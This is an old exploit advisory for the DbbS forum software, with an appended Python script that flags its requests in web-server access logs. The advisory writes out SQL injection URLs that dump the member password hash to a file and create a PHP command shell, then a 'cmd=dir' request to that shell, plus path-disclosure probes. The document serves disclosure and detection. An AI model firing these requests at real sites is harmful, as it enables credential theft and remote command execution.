DbbS<=2.0-alpha Multiple Vulnerabilities




Special thanks to rgod for his help!!!

Full path disclosure

http://www.site.com/DbbS/topics.php?fcategoryid=' 
http://www.site.com/DbbS/script.php?unavariabile[]
http://www.site.com/DbbS/script.php?GLOBALS[]
http://www.site.com/DbbS/script.php?_SERVER[]

MD5 Password

http://www.site.com/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%20null,pass%20INTO%20DUMPFILE'c:\\inetpub\\wwwroot\\dbbs\\test.txt'%20FROM%20forum_membres%20WHERE%20id='1'/* 

Create shell

http://www.site.com/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%20null,''%20INTO%20DUMPFILE'c:\\inetpub\\wwwroot\\dbbs\\suntzu.php'%20FROM%20forum_categories/* 

Launch a command

http://www.site.com/DbbS/suntzu.php?cmd=dir 

XSS

 

 


by rgod and yamcho
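
For defenders checking web-server logs for the requests listed in this advisory, the following added example (not part of the original advisory and not DbbS code) flags them in access-log lines. It assumes combined-format log lines and that legitimate fcategoryid values are non-negative integers; the sample lines, rule names and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (not captured traffic). 192.0.2.x is a documentation
# address range and 'PATH' stands in for the file path in the advisory's requests.
SAMPLE_LOG = r"""
192.0.2.10 - - [01/Jan/2006:10:00:00 +0000] "GET /DbbS/topics.php?fcategoryid=3 HTTP/1.1" 200 5120
192.0.2.66 - - [01/Jan/2006:10:00:05 +0000] "GET /DbbS/topics.php?fcategoryid=' HTTP/1.1" 200 812
192.0.2.66 - - [01/Jan/2006:10:00:09 +0000] "GET /DbbS/script.php?GLOBALS[] HTTP/1.1" 200 640
192.0.2.66 - - [01/Jan/2006:10:00:20 +0000] "GET /DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%20null,pass%20INTO%20DUMPFILE'PATH'%20FROM%20forum_membres/* HTTP/1.1" 200 300
192.0.2.66 - - [01/Jan/2006:10:00:31 +0000] "GET /DbbS/suntzu.php?cmd=dir HTTP/1.1" 200 2048
""".strip().splitlines()

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SUPERGLOBAL = re.compile(r'^(GLOBALS|_SERVER|_GET|_POST|_COOKIE|_REQUEST|_FILES|_ENV)\b')
UNION = re.compile(r'\bunion\b.*\bselect\b', re.I | re.S)
FILE_WRITE = re.compile(r'\binto\s+(dumpfile|outfile)', re.I)

def classify(log_line):
    """Return the sorted list of findings for one access-log line."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    findings = set()
    # parse_qsl percent-decodes names and values; keep_blank_values keeps
    # valueless names such as "GLOBALS[]" instead of silently dropping them.
    for name, value in parse_qsl(urlsplit(m.group(1)).query, keep_blank_values=True):
        if SUPERGLOBAL.match(name):
            findings.add("superglobal-param")        # PHP superglobal used as a parameter name
        elif "[" in name:
            findings.add("array-param")              # array-typed parameter (path disclosure probe)
        if name == "fcategoryid" and not re.fullmatch(r"\d+", value):
            findings.add("non-numeric-fcategoryid")  # assumption: ids are non-negative integers
        if UNION.search(value):
            findings.add("union-select")
        if FILE_WRITE.search(value):
            findings.add("sql-file-write")           # INTO DUMPFILE / INTO OUTFILE
        if name == "cmd":
            findings.add("cmd-param")                # parameter used by the dropped script
    return sorted(findings)

def scan(lines):
    """Return (line_number, findings) for every line with at least one finding."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := classify(line))]

if __name__ == "__main__":
    for lineno, found in scan(SAMPLE_LOG):
        print(lineno, ", ".join(found))
```

A hit on sql-file-write followed by requests to a previously unseen .php file under the web root is the sequence to escalate, since it matches the file-creation step the advisory describes.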
